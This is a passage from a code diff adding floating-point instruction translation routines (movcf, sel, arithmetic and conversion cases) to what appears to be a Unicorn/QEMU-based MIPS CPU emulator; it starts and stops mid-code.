tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + } else { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs]); + } + gen_set_label(tcg_ctx, l1); +} + +static inline void gen_movcf_s (DisasContext *ctx, int fs, int fd, int cc, int tf) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + int cond; + TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); + int l1 = gen_new_label(tcg_ctx); + + if (tf) + cond = TCG_COND_EQ; + else + cond = TCG_COND_NE; + + tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1U << (get_fp_bit(cc) & 0x1f)); + tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l1); + gen_load_fpr32(ctx, t0, fs); + gen_store_fpr32(ctx, t0, fd); + gen_set_label(tcg_ctx, l1); + tcg_temp_free_i32(tcg_ctx, t0); +} + +static inline void gen_movcf_d (DisasContext *ctx, int fs, int fd, int cc, int tf) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + int cond; + TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp0; + int l1 = gen_new_label(tcg_ctx); + + if (tf) + cond = TCG_COND_EQ; + else + cond = TCG_COND_NE; + + tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1U << (get_fp_bit(cc) & 0x1f)); + tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l1); + tcg_temp_free_i32(tcg_ctx, t0); + fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + gen_set_label(tcg_ctx, l1); +} + +static inline void gen_movcf_ps(DisasContext *ctx, int fs, int fd, + int cc, int tf) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + int cond; + TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + + if (tf) + cond = TCG_COND_EQ; + else + cond = TCG_COND_NE; + + tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1U << (get_fp_bit(cc) & 0x1f)); + tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l1); + gen_load_fpr32(ctx, t0, fs); + gen_store_fpr32(ctx, t0, fd); + gen_set_label(tcg_ctx, l1); + + tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1U << (get_fp_bit(cc+1) & 0x1f)); + tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l2); + gen_load_fpr32h(ctx, t0, fs); + gen_store_fpr32h(ctx, t0, fd); + tcg_temp_free_i32(tcg_ctx, t0); + gen_set_label(tcg_ctx, l2); +} + +static void gen_sel_s(DisasContext *ctx, enum fopcode op1, int fd, int ft, + int fs) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv_i32 t1 = tcg_const_i32(tcg_ctx, 0); + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fd); + gen_load_fpr32(ctx, fp1, ft); + gen_load_fpr32(ctx, fp2, fs); + + switch (op1) { + case OPC_SEL_S: + tcg_gen_andi_i32(tcg_ctx, fp0, fp0, 1); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, fp0, fp0, t1, fp1, fp2); + break; + case OPC_SELEQZ_S: + tcg_gen_andi_i32(tcg_ctx, fp1, fp1, 1); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, fp0, fp1, t1, fp2, t1); + break; + case OPC_SELNEZ_S: + tcg_gen_andi_i32(tcg_ctx, fp1, fp1, 1); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, fp0, fp1, t1, fp2, t1); + break; + default: + MIPS_INVAL("gen_sel_s"); + generate_exception (ctx, EXCP_RI); + break; + } + + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp2); + tcg_temp_free_i32(tcg_ctx, fp1); + tcg_temp_free_i32(tcg_ctx, fp0); + tcg_temp_free_i32(tcg_ctx, t1); +} + +static void gen_sel_d(DisasContext *ctx, enum fopcode op1, int fd, int ft, + int fs) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv_i64 t1 = tcg_const_i64(tcg_ctx, 0); + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fd); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fs); + + switch (op1) { + case OPC_SEL_D: + tcg_gen_andi_i64(tcg_ctx, fp0, fp0, 1); + tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, fp0, fp0, t1, fp1, fp2); + break; + case OPC_SELEQZ_D: + tcg_gen_andi_i64(tcg_ctx, fp1, fp1, 1); + tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, fp0, fp1, t1, fp2, t1); + break; + case OPC_SELNEZ_D: + tcg_gen_andi_i64(tcg_ctx, fp1, fp1, 1); + tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, fp0, fp1, t1, fp2, t1); + break; + default: + MIPS_INVAL("gen_sel_d"); + generate_exception (ctx, EXCP_RI); + break; + } + + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + tcg_temp_free_i64(tcg_ctx, fp1); + tcg_temp_free_i64(tcg_ctx, fp0); + tcg_temp_free_i64(tcg_ctx, t1); +} + +static void gen_farith (DisasContext *ctx, enum fopcode op1, + int ft, int fs, int fd, int cc) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "farith"; + const char *condnames[] = { + "c.f", + "c.un", + "c.eq", + "c.ueq", + "c.olt", + "c.ult", + "c.ole", + "c.ule", + "c.sf", + "c.ngle", + "c.seq", + "c.ngl", + "c.lt", + "c.nge", + "c.le", + "c.ngt", + }; + const char *condnames_abs[] = { + "cabs.f", + "cabs.un", + "cabs.eq", + "cabs.ueq", + "cabs.olt", + "cabs.ult", + "cabs.ole", + "cabs.ule", + "cabs.sf", + "cabs.ngle", + "cabs.seq", + "cabs.ngl", + "cabs.lt", + "cabs.nge", + "cabs.le", + "cabs.ngt", + }; + enum { BINOP, CMPOP, OTHEROP } optype = OTHEROP; + uint32_t func = ctx->opcode & 0x3f; + + switch (op1) { + case OPC_ADD_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_add_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "add.s"; + optype = BINOP; + break; + case OPC_SUB_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_sub_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "sub.s"; + optype = BINOP; + break; + case OPC_MUL_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_mul_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "mul.s"; + optype = BINOP; + break; + case OPC_DIV_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_div_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "div.s"; + optype = BINOP; + break; + case OPC_SQRT_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_sqrt_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "sqrt.s"; + break; + case OPC_ABS_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_abs_s(tcg_ctx, fp0, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "abs.s"; + break; + case OPC_MOV_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "mov.s"; + break; + case OPC_NEG_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_chs_s(tcg_ctx, fp0, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "neg.s"; + break; + case OPC_ROUND_L_S: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr32(ctx, fp32, fs); + gen_helper_float_roundl_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); + tcg_temp_free_i32(tcg_ctx, fp32); + gen_store_fpr64(ctx, fp64, fd); + tcg_temp_free_i64(tcg_ctx, fp64); + } + opn = "round.l.s"; + break; + case OPC_TRUNC_L_S: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr32(ctx, fp32, fs); + gen_helper_float_truncl_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); + tcg_temp_free_i32(tcg_ctx, fp32); + gen_store_fpr64(ctx, fp64, fd); + tcg_temp_free_i64(tcg_ctx, fp64); + } + opn = "trunc.l.s"; + break; + case OPC_CEIL_L_S: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr32(ctx, fp32, fs); + gen_helper_float_ceill_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); + tcg_temp_free_i32(tcg_ctx, fp32); + gen_store_fpr64(ctx, fp64, fd); + tcg_temp_free_i64(tcg_ctx, fp64); + } + opn = "ceil.l.s"; + break; + case OPC_FLOOR_L_S: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr32(ctx, fp32, fs); + gen_helper_float_floorl_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); + tcg_temp_free_i32(tcg_ctx, fp32); + gen_store_fpr64(ctx, fp64, fd); + tcg_temp_free_i64(tcg_ctx, fp64); + } + opn = "floor.l.s"; + break; + case OPC_ROUND_W_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_roundw_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "round.w.s"; + break; + case OPC_TRUNC_W_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_truncw_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "trunc.w.s"; + break; + case OPC_CEIL_W_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_ceilw_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "ceil.w.s"; + break; + case OPC_FLOOR_W_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_floorw_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "floor.w.s"; + break; + case OPC_SEL_S: + check_insn(ctx, ISA_MIPS32R6); + gen_sel_s(ctx, op1, fd, ft, fs); + opn = "sel.s"; + break; + case OPC_SELEQZ_S: + check_insn(ctx, ISA_MIPS32R6); + gen_sel_s(ctx, op1, fd, ft, fs); + opn = "seleqz.s"; + break; + case OPC_SELNEZ_S: + check_insn(ctx, ISA_MIPS32R6); + gen_sel_s(ctx, op1, fd, ft, fs); + opn = "selnez.s"; + break; + case OPC_MOVCF_S: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + gen_movcf_s(ctx, fs, fd, (ft >> 2) & 0x7, ft & 0x1); + opn = "movcf.s"; + break; + case OPC_MOVZ_S: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + { + int l1 = gen_new_label(tcg_ctx); + TCGv_i32 fp0; + + if (ft != 0) { + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, *cpu_gpr[ft], 0, l1); + } + fp0 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + gen_set_label(tcg_ctx, l1); + } + opn = "movz.s"; + break; + case OPC_MOVN_S: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + { + int l1 = gen_new_label(tcg_ctx); + TCGv_i32 fp0; + + if (ft != 0) { + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, *cpu_gpr[ft], 0, l1); + fp0 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + gen_set_label(tcg_ctx, l1); + } + } + opn = "movn.s"; + break; + case OPC_RECIP_S: + check_cop1x(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_recip_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "recip.s"; + break; + case OPC_RSQRT_S: + check_cop1x(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_rsqrt_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "rsqrt.s"; + break; + case OPC_MADDF_S: + check_insn(ctx, ISA_MIPS32R6); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_load_fpr32(ctx, fp2, fd); + gen_helper_float_maddf_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + gen_store_fpr32(ctx, fp2, fd); + tcg_temp_free_i32(tcg_ctx, fp2); + tcg_temp_free_i32(tcg_ctx, fp1); + tcg_temp_free_i32(tcg_ctx, fp0); + opn = "maddf.s"; + } + break; + case OPC_MSUBF_S: + check_insn(ctx, ISA_MIPS32R6); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_load_fpr32(ctx, fp2, fd); + gen_helper_float_msubf_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + gen_store_fpr32(ctx, fp2, fd); + tcg_temp_free_i32(tcg_ctx, fp2); + tcg_temp_free_i32(tcg_ctx, fp1); + tcg_temp_free_i32(tcg_ctx, fp0); + opn = "msubf.s"; + } + break; + case OPC_RINT_S: + check_insn(ctx, ISA_MIPS32R6); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_rint_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + opn = "rint.s"; + } + break; + case OPC_CLASS_S: + check_insn(ctx, ISA_MIPS32R6); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_class_s(tcg_ctx, fp0, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + opn = "class.s"; + } + break; + case OPC_MIN_S: /* OPC_RECIP2_S */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_MIN_S */ + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_min_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1); + gen_store_fpr32(ctx, fp2, fd); + tcg_temp_free_i32(tcg_ctx, fp2); + tcg_temp_free_i32(tcg_ctx, fp1); + tcg_temp_free_i32(tcg_ctx, fp0); + opn = "min.s"; + } else { + /* OPC_RECIP2_S */ + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_recip2_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "recip2.s"; + } + break; + case OPC_MINA_S: /* OPC_RECIP1_S */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_MINA_S */ + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_mina_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1); + gen_store_fpr32(ctx, fp2, fd); + tcg_temp_free_i32(tcg_ctx, fp2); + tcg_temp_free_i32(tcg_ctx, fp1); + tcg_temp_free_i32(tcg_ctx, fp0); + opn = "mina.s"; + } else { + /* OPC_RECIP1_S */ + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_recip1_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "recip1.s"; + } + break; + case OPC_MAX_S: /* OPC_RSQRT1_S */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_MAX_S */ + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_max_s(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); + gen_store_fpr32(ctx, fp1, fd); + tcg_temp_free_i32(tcg_ctx, fp1); + tcg_temp_free_i32(tcg_ctx, fp0); + opn = "max.s"; + } else { + /* OPC_RSQRT1_S */ + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_rsqrt1_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "rsqrt1.s"; + } + break; + case OPC_MAXA_S: /* OPC_RSQRT2_S */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_MAXA_S */ + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_maxa_s(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); + gen_store_fpr32(ctx, fp1, fd); + tcg_temp_free_i32(tcg_ctx, fp1); + tcg_temp_free_i32(tcg_ctx, fp0); + opn = "maxa.s"; + } else { + /* OPC_RSQRT2_S */ + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_rsqrt2_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "rsqrt2.s"; + } + break; + case OPC_CVT_D_S: + check_cp1_registers(ctx, fd); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr32(ctx, fp32, fs); + gen_helper_float_cvtd_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); + tcg_temp_free_i32(tcg_ctx, fp32); + gen_store_fpr64(ctx, fp64, fd); + tcg_temp_free_i64(tcg_ctx, fp64); + } + opn = "cvt.d.s"; + break; + case OPC_CVT_W_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_cvtw_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "cvt.w.s"; + break; + case OPC_CVT_L_S: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr32(ctx, fp32, fs); + gen_helper_float_cvtl_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); + tcg_temp_free_i32(tcg_ctx, fp32); + gen_store_fpr64(ctx, fp64, fd); + tcg_temp_free_i64(tcg_ctx, fp64); + } + opn = "cvt.l.s"; + break; + case OPC_CVT_PS_S: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + TCGv_i32 fp32_0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp32_1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp32_0, fs); + gen_load_fpr32(ctx, fp32_1, ft); + tcg_gen_concat_i32_i64(tcg_ctx, fp64, fp32_1, fp32_0); + tcg_temp_free_i32(tcg_ctx, fp32_1); + tcg_temp_free_i32(tcg_ctx, fp32_0); + gen_store_fpr64(ctx, fp64, fd); + tcg_temp_free_i64(tcg_ctx, fp64); + } + opn = "cvt.ps.s"; + break; + case OPC_CMP_F_S: + case OPC_CMP_UN_S: + case OPC_CMP_EQ_S: + case OPC_CMP_UEQ_S: + case OPC_CMP_OLT_S: + case OPC_CMP_ULT_S: + case OPC_CMP_OLE_S: + case OPC_CMP_ULE_S: + case OPC_CMP_SF_S: + case OPC_CMP_NGLE_S: + case OPC_CMP_SEQ_S: + case OPC_CMP_NGL_S: + case OPC_CMP_LT_S: + case OPC_CMP_NGE_S: + case OPC_CMP_LE_S: + case OPC_CMP_NGT_S: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + if (ctx->opcode & (1 << 6)) { + gen_cmpabs_s(ctx, func-48, ft, fs, cc); + opn = condnames_abs[func-48]; + } else { + gen_cmp_s(ctx, func-48, ft, fs, cc); + opn = condnames[func-48]; + } + break; + case OPC_ADD_D: + check_cp1_registers(ctx, fs | ft | fd); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_add_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "add.d"; + optype = BINOP; + break; + case OPC_SUB_D: + check_cp1_registers(ctx, fs | ft | fd); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_sub_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "sub.d"; + optype = BINOP; + break; + case OPC_MUL_D: + check_cp1_registers(ctx, fs | ft | fd); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_mul_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "mul.d"; + optype = BINOP; + break; + case OPC_DIV_D: + check_cp1_registers(ctx, fs | ft | fd); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_div_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "div.d"; + optype = BINOP; + break; + case OPC_SQRT_D: + check_cp1_registers(ctx, fs | fd); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_sqrt_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "sqrt.d"; + break; + case OPC_ABS_D: + check_cp1_registers(ctx, fs | fd); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_abs_d(tcg_ctx, fp0, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "abs.d"; + break; + case OPC_MOV_D: + check_cp1_registers(ctx, fs | fd); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "mov.d"; + break; + case OPC_NEG_D: + check_cp1_registers(ctx, fs | fd); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + 